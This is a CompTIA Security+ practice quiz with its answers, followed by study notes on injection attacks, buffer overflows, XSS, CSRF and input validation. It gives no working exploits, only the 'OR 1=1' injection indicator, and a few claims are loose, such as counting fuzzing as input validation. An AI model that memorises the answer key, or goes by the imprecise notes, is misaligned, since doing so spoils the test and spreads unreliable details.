CompTIA Security+: Injection Attacks Quiz

Questions and Answers

Structured Exception Handling provides control over what the application should do when faced with a syntax error.

False (B)

Input validation ensures that information received from a user only matches a specific format.

True (A)

Static Analysis involves analyzing and testing a program while it is being executed or run.

False (B)

Dynamic Analysis occurs while a program is being executed or run.

True (A)

Fuzzing is a method to inject randomized data into a software program in an attempt to find system failures.

True (A)

Backdoors are considered a good coding practice and should be utilized in computer programs.

False (B)

Directory Traversal involves accessing authorized directories by moving through the directory structure on a remote server.

False (B)

Arbitrary Code Execution happens when an attacker can execute commands on their own computer.

False (B)

XSRF prevention focuses on preventing Cross-Site Scripting (XSS) attacks.

False (B)

SQL Injection is a technique used to insert malicious SQL queries into input data.

True (A)

Flashcards are hidden until you start studying

Study Notes

Injection Attacks

• SQL Injection: an attack consisting of the insertion or injection of an SQL query via input data from the client to a web application.
• SQL Injection can be prevented through input validation and using least privilege when accessing a database.
• OR 1=1 is a common indicator of an SQL injection.

Buffer Overflows

• A buffer overflow occurs when an attacker fills up the buffer with NOP (no operation) so that the return address may hit a NOP and continue on until it finds the attacker's code to run.
• Stack refers to a reserved area of memory where the program saves the return address when a function call instruction is received.

Address Space Layout Randomization (ASLR)

• ASLR is a method used by programmers to randomly arrange the different address spaces used by a program or process to prevent buffer overflow exploits.

Cross-Site Scripting (XSS)

• XSS occurs when an attacker embeds malicious scripting commands on a trusted website.
• Types of XSS include:
  • Stored/Persistent: attempts to get data provided by the attacker to be saved on the web server by the victim.
  • Reflected: attempts to have a non-persistent effect activated by a victim clicking a link on the site.
  • DOM-based: attempts to exploit the victim's web browser.
• XSS can be prevented with output encoding and proper input validation.

Cross-Site Request Forgery (XSRF/CSRF)

• XSRF occurs when an attacker forces a user to execute actions on a web server for which they are already authenticated.
• XSRF can be prevented with tokens, encryption, XML file scanning, and cookie verification.

Input Validation

• Input validation is a process where applications verify that information received from a user matches a specific format or range of values.
• Examples of input validation include:
  • Static Analysis: reviewing the source code of an application manually or with automatic tools without running the code.
  • Dynamic Analysis: analysis and testing of a program occurs while it is being executed or run.
  • Fuzzing: injecting randomized data into a software program to find system failures, memory leaks, error handling issues, and improper input validation.

Software Vulnerabilities and Exploits

• Backdoors: code placed in computer programs to bypass normal authentication and other security mechanisms.
• Directory Traversal: a method of accessing unauthorized directories by moving through the directory structure on a remote server.
• Arbitrary Code Execution: occurs when an attacker is able to execute or run commands on a victim computer.